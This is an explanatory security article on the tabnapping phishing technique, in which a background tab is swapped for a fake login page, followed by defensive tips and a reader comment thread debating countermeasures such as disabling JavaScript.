Tabnapping - Expounded

What is Tabnapping?
With today's world offering high speed multi-core processors everyone eye for utilizing multi-tasking capabilities to its fullest with multiple browser tabs being no exception. At the time I was writing this article, I had more than nine browser tabs open and connected to various websites and I am sure that I am not unique in this. Ask me if I remember what I site I had opened in each one and the truth is no. This behavior makes me extremely vulnerable to Tabnapping attack. Many people use multiple tabs for accessing banking, Gmail, Facebook and other websites simultaneously, as it is a necessity in the world of multitasking.
The problem is that this behavior enables Tabnapping attacks. Tabnapping, from the words tab and kidnapping, use the browser’s multi tabbed environment to confuse the user and redirect any unused tab to the attacker’s phishing web page. Now, the phisher no longer has to bait unsuspecting victims via email and, more importantly, he does not have to gain the trust of their victim. Innocent users simply login to a page that they believe they have already opened.
How does it work?
Tabnapping is all about the relation of two web pages. So, suppose two web pages: Web Page X and Web Page Y. In this example, the victim was viewing Web Page X in a tab of an Internet browser and then opened another page on an additional tab of the browser. If the user does not return to Web Page X for some pre-specified time, Web Page X will automatically redirect to Web Page P (the phishing page). This redirection and checking for user actions is done by JavaScript that runs transparently in the background. This java-script modifies the contents of one tab while the user is focused on another tab.
According to Aza Raskin, creative lead of Mozilla and discoverer of this attack, tabnapping works like this: the user navigates to a normal-looking site, and using JavaScript the site detects the page has lost focus and changes the displayed favicon with another. The replacement favicon could be for Gmail, and the page title changes accordingly, along with the page itself to be replaced with a Gmail clone login harvesting site. The unwary user, assuming they’ve had a Gmail page open, might then quickly scan the numerous tabs open in the browser and select this fake one, assume it’s the real deal (as they’d already checked their email there some minutes earlier), and also assume they’d simply been logged out.
Then they log back in again, at which point they’re redirected to the real Gmail, which they never logged out of, and will also be none the wiser that anything untoward has happened since their login will appear to have succeeded. Nobody would imagine that a rogue or compromised site, using a small bit of JavaScript, could kidnap and subvert tabs like this.
Also, Raskin pointed that: Every time you include a third-party script on your page, or a Flash widget, you leave yourself wide open for an evil doer to use your site as a staging ground for this kind of attack. Tabnabbing can get really terrible when it is combined with tools like CSS history miner, which is used to detect which website the user has visited and then customizes the attack for that specific website. There are also other methods to determine if a user is currently logged into a web based service. Once the hacker knows what services a victim is currently logged in to, the attack can become even more effective.
Defending yourself from the attack
 - Don’t log-in on a tab that you haven’t opened yourself: Since the tabnapping tactic relies on you trusting that you opened the tab, if you see a tab that asks for reauthetication, close it, and go back to the page in a new tab to log in.
 - Look at the URL in your browser’s address bar before filing in any form or giving out any personal information: Unless the attackers are able to exploit a vulnerability or flaw to fake the URL, it will not match the bogus log-in screen.
Views by Manvi Sharma
Rate this article: 
Average: 1 (8 votes)
Article category: 

There are 6 Comments

Adding some practices to follow on defending the attack , as its a very tidious task to manually verfiy the URL .
Some preventive measures to be taken care of are as :

  • Keep browsers updated.
  • use antimalware softwares
  • use antimalware network devices


@Sameer:  The mentioned techniques won't be effective in preventing the attack, since traffic would appear legitimate to most of anti-malware software and n/w devices. Moreover this attack has nothing to do with vulnerabilities in browser application. Though to prevent this attack one solution could be to disable javascript in browser which would affect user's browsing experience.

@Prafull :
Anyway controlling traffic would definitely reduce the attack surface based on the concept of hardening .
At the browser level you can utilize plug-ins and tools designed to filter our malicious sites and those that contain malicious code. This would give you an added layer of defense.Keeping the browser updated will add such functionality to your defense arsenal.

@Sameer : 
Could you please elaborate the way you are going to distinguish malicious traffic directed to C&C server corresponding to a tab in Tabnapping attack.

@prafull : Below are some of the checks to maintain browser security in general :

1. Configure privacy settings: like deselect third-party cookies.

2. Configure security settings: Get a notification when sites try to install add-ons , Block reported attack sites , Block reported forgeries, deselect "remember passwords for sites" : 

3.Disable javaScript

4.Enable pop-up blocking:

5.Don’t sync:

6.Turn on automatic updates:

7.Use secure protocols:TLS 1.2


Point 2 , 3 and 6 can help you out being as an aid to prevent attack. Point 6 - Turn on automatic updates can help , if ever any patch comes for such attack . (Hypothetically)

@Sameer:- As pointed by me in previous comment, disabling javascript is one possible solution to keep Tabnapping attack at bay. But implementing controls highlighted by you in other points won't be effective in reducing attack area corresponding to Tabnapping since it is not trying to exploit any issue or vulnerability corresponding to a browser.